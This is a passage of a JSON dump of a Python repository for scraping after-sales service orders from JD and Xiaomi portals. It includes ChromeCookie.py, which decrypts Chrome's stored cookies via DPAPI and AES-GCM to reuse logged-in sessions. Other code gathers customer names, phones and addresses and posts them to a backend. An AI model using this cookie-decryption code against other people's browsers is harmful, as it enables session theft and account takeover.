print(dict(d))\n#\n#\n# getcookiefromchrome()\n"
},
{
"alpha_fraction": 0.5932432413101196,
"alphanum_fraction": 0.6256756782531738,
"avg_line_length": 31.647058486938477,
"blob_id": "3ba4f645779f0a31c1cadfdd9a19ccd1c6299421",
"content_id": "9b71dffa2838eac8768553fdc4957e5518b8dc6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2228,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 68,
"path": "/test/http2.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import asyncio\nimport json\nimport os\nimport sys\n\nimport httpx\nfrom hyper import HTTPConnection, HTTP20Connection\n\n# conn = HTTPConnection('http2bin.org:443')\n# conn.request('GET', '/get')\n# resp = conn.get_response()\n#\n# print(resp.read())\nfrom hyper.tls import init_context\n\nfrom BaseUtil import BaseUtil\n\nagent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\"\nheaders = {'Content-Type': 'application/x-www-form-urlencoded',\n 'User-Agent': agent, 'Referer': \"https://opn.jd.com/bill/search?billStatus=5\",\n 'Upgrade-Insecure-Requests': '1', 'Host': \"opn.jd.com\", 'Origin': \"https://opn.jd.com\",\n 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept': 'application/json, text/plain, */*'}\n\ndata = {\"sort\": \"billId\",\n \"order\": \"desc\",\n \"billStatuses\": \"5\",\n \"isEgBuy\": \"0\",\n \"outletsNo\": \"05928613279\",\n \"sortKind\": \"4\", \"page\": \"1\", \"rows\": \"10\", \"isAppliance\": \"1\",\n }\nresult = \"\"\nfor item in data:\n result += item + \"=\" + data[item] + \"&\"\nresult = result[:-1]\n\n# 修改路径\nrealpath = os.path.dirname(os.path.realpath(sys.argv[0]))\nprint(\"realpath>>>>\", realpath)\ncafile = os.path.join(realpath, \"resource\", 'pem', \"certs.pem\")\nprint(\"cert_loc cafile>>>\",cafile)\nconn = HTTP20Connection(host='opn.jd.com', port=443, ssl_context=init_context(cafile))\n\ncookie = BaseUtil.getCookie([{\"domain\": \".jd.com\"}])\nheaders['Cookie'] = cookie\nheaders[':authority'] = 'opn.jd.com'\nheaders[':method'] = 'POST'\nheaders[':path'] = '/bill/query.json'\nheaders[':scheme'] = 'https'\n\n\nresponse = conn.request(method='POST', url='https://opn.jd.com/bill/query.json',\n body=result,\n headers=headers)\nresp = conn.get_response(response)\nprint(resp.status)\nres = resp.read()\nprint(res)\nprint(json.loads(res))\n\n# async def test():\n# async with httpx.AsyncClient(http2=True) as client:\n# r = await client.post('https://opn.jd.com/bill/query.json', data=data, headers=headers)\n# print(r.text)\n#\n#\n# asyncio.run(test())\n"
},
{
"alpha_fraction": 0.5316514372825623,
"alphanum_fraction": 0.5460678339004517,
"avg_line_length": 51.02404022216797,
"blob_id": "137a2bf4d6b28def0096f2f33a0a924c6b1ac234",
"content_id": "508250256812e1ae84f19996a80c5a48c2d91798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10955,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 208,
"path": "/MIUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import datetime\nimport json\nimport re\nimport time\nfrom urllib import parse\nfrom urllib.parse import urlparse\n\nimport requests\n# from requests_html import HTMLSession\n# from utils.ChromeCookie import fetch_chrome_cookie\nfrom BaseUtil import BaseUtil\nfrom cookie_test import fetch_chrome_cookie\n\n\nclass MIUtil(BaseUtil):\n def __init__(self, adminid='68891', factoryid='17', baseurl='https://xms.be.xiaomi.com',\n bjdomain='http://yxgtest.bangjia.me'):\n super(MIUtil, self).__init__('', '', adminid, factoryid, baseurl, bjdomain)\n parsed_uri = urlparse(baseurl)\n self.host = parsed_uri.netloc\n self.baseurl = baseurl\n self.adminid = adminid\n self.factoryid = factoryid\n self.bjdomain = bjdomain\n self.mainurl = self.baseurl + '/admin/page!main.action'\n self.searchurl = self.baseurl + '/afterservice/afterservice!api.action'\n self.cookie = fetch_chrome_cookie(\n [{\"domain\": \".xiaomi.com\", \"fields\": ['uLocale', 'cUserId', 'userId', 'xmsbe_slh', \"xst\"]},\n {\"domain\": \".be.xiaomi.com\", \"fields\": [\"xst\"]},\n {\"domain\": \"xms.be.xiaomi.com\"},\n {\"domain\": \".xms.be.xiaomi.com\"},\n # {\"domain\": \".account.xiaomi.com\"},\n # {\"domain\": \".mi.com\"}\n ])\n # print(self.cookie)\n self.cookies = MIUtil.getCookies(self.cookie)\n self.session = requests.Session()\n # self.session = HTMLSession()\n # self.agent = random.choice(agents)\n self.agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \\\n 'Chrome/81.0.4044.113 Safari/537.36'\n self.datasuccess = {'code': 1, 'msg': '抓单成功', 'element': ''}\n self.datafail = {'code': 0, 'msg': '抓单失败,请使用谷歌浏览器登录小米账号后重试'}\n self.dataverify = {'code': 2, 'msg': '登录过期,请重新登录', 'element': ''}\n self.headers = {'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'User-Agent': self.agent,\n 'Upgrade-Insecure-Requests': '1', 'Host': self.host, 'Origin': self.baseurl,\n 'Accept-Encoding': 'gzip, deflate, br', 'Cookie': self.initCookie(self.cookies),\n 'Accept-Language': 'zh-CN,zh;q=0.9', 'Connection': 'keep-alive',\n 'Accept': 'application/json, text/javascript, */*; q=0.01'}\n\n def initCookie(self, cookies=None):\n if not cookies:\n return \"\"\n result = \"\"\n for cookie in cookies:\n result += cookie + \"=\" + cookies[cookie] + \"; \"\n return result[:-2]\n\n def loadMain(self):\n if 'userId' not in self.cookies:\n return self.datafail\n # searchurl = self.searchurl + \"?router=service_list\"\n # data = \"method=srvServicing.getJurisdictionOrg¶ms=\" + self.cookies['userId']\n # print(data)\n self.headers['Referer'] = self.mainurl + \"?\"\n # print(self.headers['Cookie'])\n # print(\"***********************************\")\n headers = self.headers.copy()\n headers[\n 'Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n response = self.session.get(self.searchurl + \"?router=service_list\", headers=headers)\n response.encoding = 'utf-8'\n # print(response.headers['Set-Cookie'])\n # orgIds = re.findall(r\"var orgId = \\\"(.+?)\\\"\", response.text, re.S)\n # datas = json.loads(response.text)\n # print(response.text)\n result = re.findall(re.compile(r\"originOrgId: ['](.*?)[']\", re.S), response.text)\n if not result or len(result) == 0:\n return self.datafail\n orgId = result[0]\n # originOrgId = re.findall(r\"originOrgId: '(.+?)',\", response.text, re.S)[0]\n originOrgId = orgId\n # print(originOrgId)\n return self.loadOrders({'orgId': orgId, \"originOrgId\": originOrgId})\n\n def loadOrders(self, param=None):\n self.headers['Referer'] = self.searchurl\n # print(self.headers['Cookie'])\n # print(\"===============\")\n startTime = (datetime.date.today() + datetime.timedelta(days=-3)).strftime(\"%Y-%m-%d\")\n endTime = (datetime.date.today() + datetime.timedelta(days=+1)).strftime(\"%Y-%m-%d\")\n params = {\"key\": \"\", \"miliao\": \"\", \"curOperator\": self.cookies['userId'], \"originOrgId\": param['originOrgId'],\n \"orgId\": param['orgId'], \"sId\": \"\", \"tel\": \"\", \"imei\": \"\", \"sn\": \"\", \"orderId\": \"\",\n \"createStartTime\": startTime, \"createEndTime\": endTime, \"signStartTime\": \"\", \"signEndTime\": \"\",\n \"closeStartTime\": \"\", \"closeEndTime\": \"\", \"returnStartTime\": \"\", \"returnEndTime\": \"\",\n \"fullStartTime\": startTime, \"fullEndTime\": endTime, \"pageInfo\": {\"pageNum\": 1, \"pageSize\": 50}}\n data = {'method': 'srvServicing.searchList',\n 'params': json.dumps(params)}\n response = self.session.post(self.searchurl, data=parse.urlencode(data), headers=self.headers)\n response.encoding = 'utf-8'\n # print(\"===================================loadOrders\")\n # print(response.text)\n datas = json.loads(response.text)\n # print(datas['result']['pageInfo']['total'])\n if datas['code'] == 1:\n try:\n data = {\"data\": json.dumps(list(self.parseOrders(datas)))}\n # print(\"data=\", data)\n requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n except Exception as e:\n print(str(e))\n return self.datafail\n return self.datasuccess\n return self.datafail\n\n def parseOrders(self, datas):\n total_num = datas['result']['pageInfo']['total']\n # print(\"total count:{}\".format(total_num))\n for order_key in datas['result']['srvInfos']:\n # flag = 0\n # for key in order_list:\n # if (order_list[key]['factorynumber'] == order_key['sId']):\n # order_list[key]['sn'] = order_list[key]['sn'] + \",\" + order_key['sns']\n # flag = 1\n # break\n # if flag == 1:\n # continue\n order_info = {'factorynumber': order_key['sId'], 'ordername': order_key['typeDesc'],\n 'username': order_key['customerName'], 'mobile': order_key['customerTel'],\n 'orderstatus': order_key['statusDesc'],\n 'machinetype': order_key['goodsNames'].replace(\"小米\", ''), 'sn': order_key['sns'],\n 'companyid': self.factoryid, 'machinebrand': '小米', 'originname': '小米系统',\n 'adminid': self.adminid}\n yield from self.getDetail(order_info, order_key)\n\n # 查询详情接口\n def getDetail(self, order, datas):\n self.headers['Referer'] = self.mainurl\n post_data = \"method=srvServicing.getCommonSrvDetail¶ms=%7B%22sId%22%3A%22\" + datas['sId'] + \\\n \"%22%2C%22conditions%22%3A%22BASEINFO%22%7D\"\n response = self.session.post(self.searchurl, data=post_data, headers=self.headers)\n response.encoding = 'utf-8'\n json_ret2 = json.loads(response.text)\n # print(\"===================================getDetail result\")\n # print(response.text)\n if json_ret2['code'] == 1:\n datas['addressDescC'] = json_ret2['result']['baseInformation']['addressDescC']\n order['address'] = json_ret2['result']['baseInformation']['addressDesc']\n timeArray = time.localtime(json_ret2['result']['baseInformation']['applyTime'] / 1000)\n otherStyleTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", timeArray)\n order['ordertime'] = otherStyleTime\n if json_ret2['result']['baseInformation']['hopeVisitTime']:\n order['repairtime'] = json_ret2['result']['baseInformation']['hopeVisitTime']\n createFrom = json_ret2['result']['baseInformation']['createFrom']\n if createFrom.find(\"预付费\") != -1 and createFrom != '':\n order['note'] = createFrom\n if len(json_ret2['result']['baseInformation']['items']) > 0:\n priceitem = json.loads(json_ret2['result']['baseInformation']['items'][0]['extendContent'])\n order['note'] = order['note'] + str(priceitem['price'])\n yield from self.showMsg(order, datas)\n\n def showMsg(self, order, datas):\n show_url = self.baseurl + '/common/common!savePrivateLogOperate.action'\n post_data = {\"content\": json.dumps({\"miliao\": [], \"name\": [datas['customerNameC']],\n \"tel\": [datas['customerTelC']],\n \"email\": [], \"address\": [datas['addressDescC']],\n \"operateKey\": datas['sId']})}\n response = self.session.post(show_url, data=post_data, headers=self.headers)\n response.encoding = 'utf-8'\n json_msg = json.loads(response.text)\n # print(\"===================================showMsg result\")\n # print(response.text)\n if 'result' in json_msg:\n order['username'] = json_msg['result']['name'][0]\n order['mobile'] = json_msg['result']['tel'][0]\n order['address'] = json_msg['result']['address'][0]\n yield self.getDescription(order, datas)\n\n # 查询处理结果,问题描述\n def getDescription(self, order, datas):\n self.headers['Referer'] = self.searchurl + '?router=service_info_detail&sId=' + datas['sId']\n post_data = \"method=srvServicing.getServiceVo¶ms=%7B%22sId%22%3A%22\" + datas[\n 'sId'] + \"%22%2C%22conditions%22%3A%22%22%7D\"\n response = self.session.post(self.searchurl, data=post_data, headers=self.headers)\n response.encoding = 'utf-8'\n json_ret3 = json.loads(response.text)\n if json_ret3['code'] == 1:\n data = json_ret3['result']\n if data['customerDesc']:\n order['description'] = data['customerDesc']\n fault = ''\n if len(data['items']) > 0:\n for item in data['items'][0]['itemHasFaults']:\n fault += item['faultName'] + \";\"\n if data['items'][0]['faultDesc']:\n fault += data['items'][0]['faultDesc'] + \";\"\n if data['items'][0]['methods']:\n fault += \"处理方法:\" + data['items'][0]['methods'][0]['name']\n if fault:\n order['note'] = fault\n return order\n\n\nif __name__ == '__main__':\n # util = MIUtil('20845', factoryid='17')\n util = MIUtil('24', factoryid='17', bjdomain='http://yxgtest.bangjia.me')\n print(util.loadMain())\n"
},
{
"alpha_fraction": 0.5984074473381042,
"alphanum_fraction": 0.6092247366905212,
"avg_line_length": 51.82539749145508,
"blob_id": "e31335e11db8d73bec330a98f2c81d195ef51dd6",
"content_id": "e450e50fb92c8e7c36aef342b097a5ba35205627",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13706,
"license_type": "no_license",
"max_line_length": 791,
"num_lines": 252,
"path": "/JDUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import json\nimport os\nimport re\nimport sys\nimport time\n\nimport requests\nfrom hyper.tls import init_context\n\nfrom BaseUtil import BaseUtil\nfrom hyper import HTTPConnection, HTTP20Connection\n\nbusinessTypes = {\"1\": \"上门安装\", \"2\": \"送货服务\", \"3\": \"提货送装\", \"4\": \"拆卸包装\", \"5\": \"退货服务\"}\nstatusTypes = {\"1\": \"新订单\", \"2\": \"自动分配失败\", \"3\": \"已分配\", \"4\": \"申请改派\", \"5\": \"已接收\", \"6\": \"已预约\", \"7\": \"已派工\",\n \"8\": \"上门完成\", \"12\": \"确认完成\", \"13\": \"取消服务\", \"14\": \"确认取消服务\", \"15\": \"客户取消\"}\n\n\nclass JDUtil(BaseUtil):\n def __init__(self, username='', passwd='', adminid='24', factoryid='19', baseurl='http://jdfw.jd.com',\n bjdomain='http://yxgtest.bangjia.me'):\n super(JDUtil, self).__init__(username, passwd, adminid, factoryid, baseurl, bjdomain)\n self.mainurl = self.baseurl + '/admin/page!main.action'\n self.searchurl = self.baseurl + '/receipt/query.json'\n self.popurl = \"https://opn.jd.com/bill/query.json\"\n self.cookie = BaseUtil.getCookie([{\"domain\": \".jd.com\"}])\n self.cookies = BaseUtil.getCookies(self.cookie)\n self.headers['Cookie'] = self.cookie\n self.headers['Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\" \\\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n self.headers['Content-Type'] = 'application/x-www-form-urlencoded'\n\n def loadMain(self):\n self.headers['Referer'] = self.baseurl + '/receipt/receiptDashboardIndex?homePageDistinguish=notAppointed'\n self.headers['Accept'] = '*/*'\n response = self.session.post(self.baseurl + \"/common/inforLinkage/getPerson\", headers=self.headers)\n response.encoding = 'utf-8'\n print(\"loadMain result:{}\".format(response.text))\n # print(\"=============================================\")\n if response.status_code == 200:\n return self.getOrgan(json.loads(response.text))\n return self.datafail\n\n def getOrgan(self, datas):\n response = self.session.post(self.baseurl + \"/wareset/getImBaseLasWare\", headers=self.headers,\n data={\"lasWareCode\": datas['wareHouseNo']})\n response.encoding = 'utf-8'\n # print(\"getOrgan result:{}\".format(response.text))\n # print(\"=============================================\")\n if response.status_code == 200:\n return self.loadMains(dict(datas, **(json.loads(response.text)[0])))\n return self.datafail\n\n def uploadOrders(self, datas):\n try:\n data = {\"data\": json.dumps(datas)}\n # print(\"uploadOrders data={}\".format(data))\n requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n except Exception as e:\n print(\"addorder failed:\", e)\n return self.datafail\n return self.datasuccess\n\n def mergeData(self, result, orders):\n if orders and \"code\" not in orders:\n result += orders\n return result\n\n def loadMains(self, datas):\n result = []\n result = self.mergeData(result, self.loadPageOrders(datas, 0))\n result = self.mergeData(result, self.loadPageOrders(datas, 1))\n self.uploadOrders(result)\n time.sleep(1)\n result = []\n result = self.mergeData(result, self.loadPageOrders(datas, 3))\n time.sleep(1)\n result = self.mergeData(result, self.loadPageOrders(datas, 4))\n # print(\"loadMains result={}\".format(result))\n # print(\"=============================================\")\n return self.uploadOrders(result)\n\n def ispop(self, serviceType):\n return serviceType == 3 or serviceType == 4\n\n def loadPopOrder(self, data, serviceType):\n result = \"\"\n for item in data:\n result += item + \"=\" + data[item] + \"&\"\n result = result[:-1]\n # 修改路径\n realpath = os.path.dirname(os.path.realpath(sys.argv[0]))\n print(\"realpath>>>>\", realpath)\n cafile = os.path.join(realpath, \"resource\", 'pem', \"certs.pem\")\n print(\"cert_loc cafile>>>\", cafile)\n conn = HTTP20Connection(host='opn.jd.com', port=443, ssl_context=init_context(cafile))\n\n headers = self.headers.copy()\n headers['Referer'] = \"https://opn.jd.com/bill/search?billStatus=5\"\n headers['Host'] = \"opn.jd.com\"\n headers['Origin'] = \"https://opn.jd.com\"\n headers[':authority'] = 'opn.jd.com'\n headers[':method'] = 'POST'\n headers[':path'] = '/bill/query.json'\n headers[':scheme'] = 'https'\n response = conn.request(method='POST', url=self.popurl, body=result, headers=headers)\n resp = conn.get_response(response)\n if resp.status != 200:\n print(\"请求{}失败,返回:{},请使用谷歌浏览器重新登录京东系统\".format(response.url, response.text))\n return self.dataverify\n res = resp.read()\n # print(res)\n return list(self.parseOrders(json.loads(res), serviceType))\n\n def loadPageOrders(self, datas, serviceType):\n \"\"\" 抓取serviceType [0,1] 类型的所有单子 # 0为安维工单 1为售后工单 3为POP服务单 4为POP家具服务单\"\"\"\n data = {\n \"sort\": \"returnTime\" if not self.ispop(serviceType) else \"billId\", \"order\": \"desc\",\n \"sortKind\": \"4\", \"page\": \"1\", \"rows\": \"500\", \"reservationStatus\": \"\", # 3 为未预约状态 空为所有状态\n }\n if self.ispop(serviceType):\n data['isAppliance'] = '1' if serviceType == 3 else '0'\n data['billStatuses'] = '5'\n data['isEgBuy'] = '0'\n data['outletsNo'] = str(datas['infoLink'])\n return self.loadPopOrder(data, serviceType)\n else:\n data['serviceType'] = str(serviceType)\n data['fastDealNum'] = '5' # 5为 待预约,7为待反馈 0为所有状态\n data['esSwitch'] = '1'\n data['subCompanyId'] = str(datas['orgNo'])\n data['wareInfoId'] = str(datas['lasWareRelation'])\n data['outletsId'] = str(datas['infoLink'])\n\n result = \"\"\n for item in data:\n result += item + \"=\" + data[item] + \"&\"\n result = result + \"freeinstall=&startStatus=&endStatus=&timeout=&todayOtherReservationConditionName=&productBrand=&productType1=&productType2=&productType3=&orderId=&bizOrderId=&ordernoGroup=&customerName=&customerPhone=&serviceStreet=&wareId=&productName=&orderStatus=&orderStatusGroup=&createOrderTimeBegin=&createOrderTimeEnd=&reservationDateBegin=&reservationDateEnd=&firstReservationTimeBegin=&firstReservationTimeEnd=&changedReservationDateBegin=&changedReservationDateEnd=&feedbackStatus=&orderOrderStatus=&expectAtHomeDateBegin=&expectAtHomeDateEnd=&atHomeFinishDateBegin=&atHomeFinishDateEnd=&deliveryDateStart=&deliveryDateEnd=&homePageDistinguish=&fastDealNumByColor=&reportLessFlag=&superExperienceStore=&sourceOrderIdGroup=&sellerId=&sellerName=&eclpBusinessNo=&isFast=\"\n # print(\"loadPageOrders requesturl=\", result)\n params = {}\n datas = result.split(\"&\")\n for data in datas:\n content = data.split(\"=\")\n if len(content) > 1:\n params[content[0]] = content[1]\n self.headers['X-Requested-With'] = 'XMLHttpRequest'\n self.headers['Accept'] = 'application/json, text/javascript, */*; q=0.01'\n self.headers['Referer'] = self.baseurl + '/receipt/receiptDashboardIndex?homePageDistinguish=notAppointed' \\\n '&serviceType=' + str(serviceType)\n url = self.searchurl if not self.ispop(serviceType) else self.popurl\n response = self.session.post(url, headers=self.headers, data=params)\n response.encoding = 'utf-8'\n # print(response.url)\n # print(response.text)\n # print(response.headers)\n if response.status_code != 200 or \"error\" in response.url:\n print(\"请求{}失败,返回:{},请使用谷歌浏览器重新登录京东系统\".format(response.url, response.text))\n return self.dataverify\n return list(self.parseOrders(self.getjson(response), serviceType))\n\n def parseOrders(self, datas, serviceType):\n if 'total' not in datas:\n return []\n total_num = datas['total']\n print(\"total count:{}\".format(total_num))\n for data in datas['rows']:\n yield from self.parseOrder(data, serviceType)\n\n def getordername(self, data, serviceType):\n if self.ispop(serviceType) and 'businessType' in data and data['businessType']:\n index = str(int(data['businessType']))\n return businessTypes[index] if index in businessTypes else ''\n elif not self.ispop(serviceType) and 'reservationServiceTypeName' in data:\n return data['reservationServiceTypeName'] if data['reservationServiceTypeName'] else ''\n\n def parseOrder(self, data, serviceType):\n # reservationServiceTypeName :安装 createOrderTime:1588123851000\n mobile = str(data['customerPhone']) if 'customerPhone' in data else ''\n address = str(data['serviceStreet']) if 'serviceStreet' in data else data['customerAddress']\n address = address.replace(\",\", \"\").replace(\",\", \"\") if address else ''\n brand = re.sub(r'([^()]*)', '', data['productBrandName'])\n createTimeKey = \"createOrderTime\" if 'createOrderTime' in data else \"createTime\"\n orderid = \"orderno\" if not self.ispop(serviceType) else \"billNo\"\n orderno = \"_{}\".format(data[orderid]) if orderid in data and data[orderid] else ''\n ps = (\" 安维单号:{}\" if serviceType != 1 else \" 售后单号:{}\").format(data[orderid])\n if 'expectAtHomeDate' in data:\n repairtime = data['expectAtHomeDate']\n elif 'reservationInstallTime' in data and data['reservationInstallTime']:\n repairtime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(data['reservationInstallTime'] / 1000))\n else:\n repairtime = ''\n order_info = {\n 'factorynumber': (data['orderId'] if 'orderId' in data else data['orderid']) + orderno,\n 'ordername': self.getordername(data, serviceType),\n 'username': data['customerName'], 'mobile': mobile, 'originname': '京东系统',\n 'orderstatus': data['orderStatusName'] if 'orderStatusName' in data else statusTypes[\"5\"],\n 'machinetype': data['productTypeName'] if 'productTypeName' in data else data['productCategoryName'],\n 'machinebrand': brand, 'version': data['productName'],\n 'sn': data['wareId'] if 'wareId' in data else data['productSku'],\n 'companyid': self.factoryid, 'adminid': self.adminid, 'address': address,\n 'province': data['serviceProvince'] if 'serviceProvince' in data else data['provinceName'],\n 'city': data['serviceCity'] if 'serviceCity' in data else data['cityName'],\n 'county': data['serviceCounty'] if 'serviceCounty' in data else data['districtName'],\n 'town': data['serviceDistrict'] if 'serviceDistrict' in data else data['streetName'],\n 'ordertime': time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(data[createTimeKey] / 1000)),\n 'repairtime': repairtime,\n 'note': str(data['feedbackNote'] if 'feedbackNote' in data else data['saleFrom']) + str(\n data['exceptionFeeApprovalStatusName'] if 'exceptionFeeApprovalStatusName' in data else ''),\n 'description': str(data['feedbackResult'] if 'feedbackResult' in data else data['reservationFailReason']) + ps,\n 'ordernoSecret': data['ordernoSecret'] if 'ordernoSecret' in data else data['businessNo']\n }\n order_info = JDUtil.clearAddress(order_info)\n if not self.ispop(serviceType):\n order_info = self.getUserInfo(order_info)\n # print(order_info)\n yield order_info\n\n def parseUserMobile(self, data, url, referer):\n header = self.headers.copy()\n header['Referer'] = referer\n response = self.session.get(url, headers=header)\n # print(\"parseUserMobile response:{}\".format(response.text))\n if response.status_code != 200:\n return data\n bsObj = self.getsoup(response)\n tr = bsObj.find(\"form\", {\"id\": \"searchForm\"}).find(\"tbody\").find(\"tr\")\n data['mobile'] = tr.find(\"input\", {\"name\": \"customerPhone\"})[\"value\"]\n return data\n\n def getUserInfo(self, data):\n if not data or \"ordernoSecret\" not in data:\n return data\n userurl = self.baseurl + \"/receipt/manage?orderno=\" + data['ordernoSecret']\n self.headers['Accept'] = \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,\" \\\n \"*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\"\n response = self.session.get(userurl, headers=self.headers)\n # print(\"getUserInfo response:{}\".format(response.text))\n if response.status_code != 200:\n return data\n bsObj = self.getsoup(response)\n iframe = bsObj.find(\"iframe\", {\"id\": \"innerframe\"})\n if iframe:\n url = self.baseurl + str(iframe['src'])\n # parsed_url = urlparse(url)\n # params = dict(parse.parse_qsl(parsed_url.query))\n return self.parseUserMobile(data, url, userurl)\n return data\n\n\nif __name__ == '__main__':\n util = JDUtil(adminid='24', factoryid='19')\n # util = JDUtil(adminid='69046', factoryid='19')\n print(util.loadMain())\n"
},
{
"alpha_fraction": 0.5559171438217163,
"alphanum_fraction": 0.586982250213623,
"avg_line_length": 34.95744705200195,
"blob_id": "ce75375fabedd60357e94676b98c1c021a1d0cc4",
"content_id": "0739543ec27919db786b83fe84516c0975d79f14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3380,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 94,
"path": "/ChromeCookie.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import os\nimport json\nimport base64\nimport win32crypt\nfrom Crypto.Cipher import AES\nimport sqlite3\n\n'''\n[(0, 'creation_utc', 'INTEGER', 1, None, 0), (1, 'host_key', 'TEXT', 1, None, 0), (2, 'name', 'TEXT', 1, None, 0), (3, 'value', '\nTEXT', 1, None, 0), (4, 'path', 'TEXT', 1, None, 0), (5, 'expires_utc', 'INTEGER', 1, None, 0), (6, 'is_secure', 'INTEGER', 1, No\nne, 0), (7, 'is_httponly', 'INTEGER', 1, None, 0), (8, 'last_access_utc', 'INTEGER', 1, None, 0), (9, 'has_expires', 'INTEGER', 1\n, '1', 0), (10, 'is_persistent', 'INTEGER', 1, '1', 0), (11, 'priority', 'INTEGER', 1, '1', 0), (12, 'encrypted_value', 'BLOB', 0\n, \"''\", 0), (13, 'samesite', 'INTEGER', 1, '-1', 0), (14, 'source_scheme', 'INTEGER', 1, '0', 0)]\n'''\nsql = \"\"\"\nSELECT\n host_key, name, path,encrypted_value as value\nFROM\n cookies\n\"\"\"\n\n\ndef get_decrypted_key():\n path = r'%LocalAppData%\\Google\\Chrome\\User Data\\Local State'\n path = os.path.expandvars(path)\n with open(path, 'r', encoding='utf8') as file:\n encrypted_key = json.loads(file.read())['os_crypt']['encrypted_key']\n encrypted_key = base64.b64decode(encrypted_key) # Base64 decoding\n encrypted_key = encrypted_key[5:] # Remove DPAPI\n decrypted_key = win32crypt.CryptUnprotectData(encrypted_key, None, None, None, 0)[1] # Decrypt key\n # print(\"decrypt\",decrypted_key)\n return decrypted_key\n\n\n# get cookie\ndef get_chrome_cookie():\n cookies_path = os.environ['HOMEPATH'] + r'\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies'\n cookies_path = os.path.join(os.environ['LOCALAPPDATA'], os.environ['HOMEPATH'], cookies_path)\n con = sqlite3.connect(cookies_path)\n res = con.execute(sql).fetchall()\n # names = con.execute('PRAGMA table_info([cookies])').fetchall()\n # print(names)\n con.close()\n # print(res)\n return res\n\n\ndef decrypt_chrome_cookie(decrypted_key, data):\n # data = bytes.fromhex('763130...') # the encrypted cookie\n if data[:3] == b'v10':\n nonce = data[3:3 + 12]\n ciphertext = data[3 + 12:-16]\n tag = data[-16:]\n cipher = AES.new(decrypted_key, AES.MODE_GCM, nonce=nonce)\n # plaintext = cipher.decrypt_and_verify(ciphertext, tag) # the decrypted cookie\n plaintext = cipher.decrypt(ciphertext)\n # print(plaintext)\n return plaintext\n else:\n # print('old cookie none decrypt')\n return \"\"\n\n\ndef fetch_chrome_cookies(domain=''):\n res = get_chrome_cookie()\n list = []\n for i in res:\n if domain in i[0]:\n item = {}\n # print(type(i[3]),i[3])\n data = i[3] # the encrypted cookie\n key = get_decrypted_key()\n plaintext = decrypt_chrome_cookie(key, data)\n plaintext = str(plaintext, encoding=\"utf-8\")\n # print(\"host:\", i[0], \"name:\", i[1], \"path:\", i[2], \"value:\", plaintext)\n item[\"host\"] = i[0]\n item[\"name\"] = i[1]\n item[\"path\"] = i[2]\n item[\"value\"] = plaintext\n list.append(item)\n return list\n\n\ndef fetch_chrome_cookie(domain=''):\n cookie_list = fetch_chrome_cookies(domain)\n cookieValue = ''\n for item in cookie_list:\n cookieValue += item['name'] + '=' + item['value'] + '; '\n # print(\"fetch_chrome_cookie:\" + cookieValue)\n return cookieValue[:-1]\n\n\nif __name__ == '__main__':\n print(fetch_chrome_cookie('xiaomi.com'))\n"
},
{
"alpha_fraction": 0.7207637429237366,
"alphanum_fraction": 0.7422434091567993,
"avg_line_length": 18.090909957885742,
"blob_id": "a9cf3df8def6af51c31ef825693ea263ae9e9fb7",
"content_id": "fc3966b32cff1791917ed1a839575494607a2b0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 437,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 22,
"path": "/README.md",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "# scrap\n抓单\n\n\npyupdater init\n\npyupdater keys -i\n\npyupdater build --console --hidden-import=SocketServer --app-version 1.0.0 huadi.py\n\npyupdater build --console --app-version 1.0.0 huadi.py\n\npyupdater pkg --process --sign\n\n下载文件位于:\nC:\\Users\\wangyl\\AppData\\Local\\wangyl\\huadi\\update\n\npyupdater build -F -i E:\\code\\python\\scrap\\huawei\\logo.ico --app-version 1.0.5 huadi.py\n\npyupdater pkg --process --sign\n\nhuadi.exe --debug"
},
{
"alpha_fraction": 0.5465705990791321,
"alphanum_fraction": 0.5724579691886902,
"avg_line_length": 33.69444274902344,
"blob_id": "70439c290c2b700df93280f27e011f1cb3ddffc9",
"content_id": "98379c9b071a3826ccfc458919b288713aa4045a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4755,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 108,
"path": "/asdfsd.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
